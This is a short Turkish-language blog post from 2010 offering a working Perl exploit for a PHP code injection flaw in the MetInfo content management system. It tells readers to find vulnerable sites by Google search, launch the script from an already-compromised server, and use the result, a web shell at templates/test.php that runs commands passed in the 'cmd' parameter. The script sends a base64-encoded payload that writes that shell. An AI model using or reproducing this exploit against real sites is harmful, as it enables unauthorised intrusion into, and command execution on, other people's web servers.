31 Ekim 2010 Pazar

MetInfo Php Code İnjection

Hack huck işlerine bir müddet ara verip ticarete atıldım bunları yakınımda olanlar bilir :) bu sebeble blogumuda baya boşladım.. 1 - 2 paylaşım yapayım dedim gece gece..

Gelelim bugun kullanımına :
1. : Googlede : Powered by MetInfo aratıyoruz.
2.: Asagıda verdigim kodları notapede koyup env.pl gibi kaydediyoruz.
3.: Elimizde var olan herhangi bir Shell soktugumuz unix sunucuya env.pl dosyamızı atıyoruz.
4.: Shellimizde komut satırına gelip 1. kuralda yaptıgımız arama sonucunda googlede çıkan sitelerden birine giriyoruz
5.: perl env.pl  site.com gibi çalıştırıyoruz
6.:  site:com/templates/test.php?cmd=id gibi urlde çagırıyoruz..
7.: Sonrası Egonuza kalmış :)

#!/usr/bin/env perl
use LWP::UserAgent;
die "Usage: $0 Ex:$0 victim.com\n" unless($ARGV[0]);
my $victim = $ARGV[0];
$user_agent = new LWP::UserAgent;
$vul_request = new HTTP::Request('GET',"http://$victim/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIHBhc3N0aHJ1KCRfR0VUW2NtZF0pPz4nKTs=");
# fputs(fopen('../templates/test.php','w+'),'');
$user_agent->request($vul_request);
$response = $user_agent->request(new HTTP::Request('GET',"http://$victim/templates/test.php"));
if($response->is_success)
{
    print "code injection successful ! plz look at http://$victim/templates/test.php?cmd=id";
}
else
{
print "could not connect to $victim";
}

Hiç yorum yok :

Yorum Gönder